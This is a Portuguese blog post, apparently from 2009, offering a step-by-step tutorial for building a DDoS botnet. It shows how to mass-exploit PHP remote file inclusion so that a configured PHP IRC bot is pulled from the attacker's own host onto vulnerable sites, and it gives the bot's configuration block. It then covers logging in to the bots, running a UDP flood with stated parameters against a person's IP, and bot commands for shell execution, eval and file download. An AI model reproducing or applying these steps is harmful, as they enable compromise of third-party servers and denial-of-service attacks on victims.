sexta-feira, 11 de setembro de 2009

Tutorial DoS ( Nukando um servidor)

·

Primeiramente baixem os programas


:arrow: Cliente mIRC [Download] - Cliente "oficial" do mIRC. Você também pode baixar scripts como CyberScript, ou até mesmo usar o ChatZilla que é uma extenção para Firefox, vai de sua preferência.

:arrow: xRoot + Triad List Sites Editor [Download] - Usamos o xRoot e o Triad List Sites Editor para rodar todos os bots de uma vez. Imaginem se tivessemos que visitar site por site, testando máquina por máquina, ia demorar muito pra carregar os bots.
Senha para descompactar: www.forum-invaders.com.br

:arrow: pBot [Download] - Essa é uma botnet em PHP muito boa. A vantagem de usar botnet em PHP, é que roda tanto em Linux quando Windows, já que podemos rodar direto pelo link como se fôssemos usar o pBot como uma phpshell. É só upar o seu pBot configurado em algum host de sua preferência, e rodar no RFI: http://www.host.com.br/vuln.php?fvox=http://seuhost.com.br/pBot.txt.
Vocês podem usar também botnets em perl, mas só vai rodar em Linux e é difícil rodar em todas as máquinas de uma vez só.


Configurando


A configuração do pBot é muito simples. A configuração começa na linha número 8. Localize essa parte no script, e vamos então configurar:
Código:
var $config = array("server"=>"irc.chatbr.org",
                     "port"=>6667,
                     "pass"=>"fx",
                     "prefix"=>"fvox",
                     "maxrand"=>8,
                     "chan"=>"#forum-invaders",
                     "key"=>"",
                     "modes"=>"+iB-x",
                     "password"=>"b0t",
                     "trigger"=>".",
                     "hostauth"=>"*" // * for any hostname
                     );


server: Nessa parte da configuração você deve colocar a rede em que os bots vão conectar. Ali eu coloquei irc.chatbr.org, que é uma rede muito boa onde fica o canal do fórum invaders.
port: Porta da rede. A porta padrão é 6667.
pass: Você deve colocar a senha para logar no bot. Sem a senha, você não executa comandos. No caso, a senha que eu escolhi foi fx.
prefix: O nome dos bots são gerados randomicamente. Entretanto, o prefix fica no meio do nome do bot. Exemplo de nome: [A]fvox01080371.
chan: Insira o nome do canal onde os bots vão conectar, e por onde você vai comandar os bots.
password: Caso o canal esteja em modo "+k", ou seja, canal com chave (key), coloque a senha do canal.

O resto das configurações vocês podem deixar assim mesmo.

Arrumando a lista de sites vulneráveis

Para rodar os bots, vocês vão ter que ter uma lista de sites vulneráveis a PHP Injection.
Abra o programa (-TRIAD-) List Sites Editor.exe, clique no botão abrir e selecione a lista de sites vulneráveis.
Na parte "Remover da URL:", coloque um "=" (sem aspas) no campo de texto do "Tudo que estiver a FRENTE de:" e então cliquem no Go.
Agora todos os sites estão só até o "=".
Copie todos os sites usando o Control+C ao invés do botão Salvar. O botão Salvar, grava todos os sites em um arquivo *.rtf ao invés de *.txt.
Agora cole usando Control+V no Blobo de notas e salve o arquivo.

Imagem

Rodando os bots

Agora chegou a hora de usar o xRoot. Abrindo o xRoot, vamos até a aba Scan.

Vamos clicar no botão Abrir lista e selecionar a lista que filtramos com o Triad List Sites. Aqui eu furtei algumas máquinas do R0ck. *-*

Imagem


Já com o pBot configurado e upado em algum host, colocamos o link do pBot no campo de texto referente a "CMD pra por:" (não se esqueçam de deixar o "?" depois do .txt. Em "Achar:" pode deixar em branco, afinal é só pro xRoot visitar site por site da lista mesmo.
Agora devemos clicar no botão "Por CMD" e aguardar o xRoot inserir a cmd nas urls.

Imagem

Depois de colocar a CMD após o "=" com o xRoot, é só clicar no botão "Testar sites...".
Agora como o xRoot visita site por site procurando por vulneráveis, logo os bots vão rodar automaticamente, facilitando muito as coisas! :mrgreen:

Imagem 


Logando nos bots

Sem você fazer o login nos bots, eles não te respondem aos comandos.
Para fazer o login, você deve usar o comando .user .
A senha é aquela que você definiu na parte de configuração do pBot.
Para logar, vou usar o comando .user b0t, onde "b0t" foi a senha que eu escolhi para fazer esse tutorial.

Atacando

O pBot pode fazer UDP Flood e TCP Flood.
Eu já vi algumas botnets em perl que fazem até syn flood, mas eu curto o pBot :mrgreen:
Para pacotar: .udpflood .
Eu vou usar 65000 packets, 65000 de packetsize e o delay eu usarei 30.
Então usarei: .udpflood 65000 65000 30

Como o Muniz é uma alma bem caridosa, ele me forneceu seu IP para ser pacotado, que lindo né? :cry:

Imagem


Comandos pBot

Aqui vai uma lista com outros comandos que vocês podem usar do pBot:

Citação:
= COMMANDS ============================================================================
.user //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail //send an email
.dns //dns lookup
.download //download a file
.exec // uses shell_exec() //execute a command
.cmd // uses popen() //execute a command
.info //get system information
.php // uses eval() //execute php code
.tcpflood //tcpflood attack
.udpflood //udpflood attack
.raw //raw IRC command
.rndnick //change nickname
.pscan //port scan
.ud.server [newpass] //change IRC server
---------------------------------------------------------------------------------------
Pronto qualquer duvida deixe o comentario
   

1 comentários:

Anônimo disse...
30 de março de 2011 às 15:30  

Eu tenho que comprar uma conta mo mIRC?

Deixe seu recado / dúvidas

Seja Nosso Parceiro


Seguidores

Parceiros

Está no seu momento de descanso né? Entao clique aqui! Jogos

Arquivo do Blog